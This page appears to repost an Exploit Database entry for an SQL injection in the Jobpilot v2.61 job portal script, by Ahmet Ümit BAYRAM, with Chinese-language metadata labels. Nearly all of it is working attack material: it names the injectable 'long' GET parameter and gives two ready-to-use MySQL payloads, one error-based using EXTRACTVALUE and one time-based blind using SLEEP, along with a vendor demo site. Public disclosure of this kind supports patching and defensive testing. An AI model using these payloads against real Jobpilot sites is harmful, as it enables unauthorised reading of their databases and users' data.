Jobpilot v2.61 – SQL Injection

• Exploit Database
• 17 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2023-06-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51527/

• # Exploit Title: Jobpilot v2.61 - SQL Injection
  # Date: 2023-06-17
  # Exploit Author: Ahmet Ümit BAYRAM
  # Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822
  # Demo Site: https://jobpilot.templatecookie.com
  # Tested on: Kali Linux
  # CVE: N/A
  
  ----- PoC: SQLi -----
  
  Parameter: long (GET)
  Type: error-based
  Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
  BY clause (EXTRACTVALUE)
  Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
  AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT
  (ELT(4894=4894,1))),0x71786b7171)) AND
  (1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
  Fire Contract Counties, California, United
  States&category=&price_min=&price_max=&tag=
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
  AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND
  (1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
  Fire Contract Counties, California, United
  States&category=&price_min=&price_max=&tag=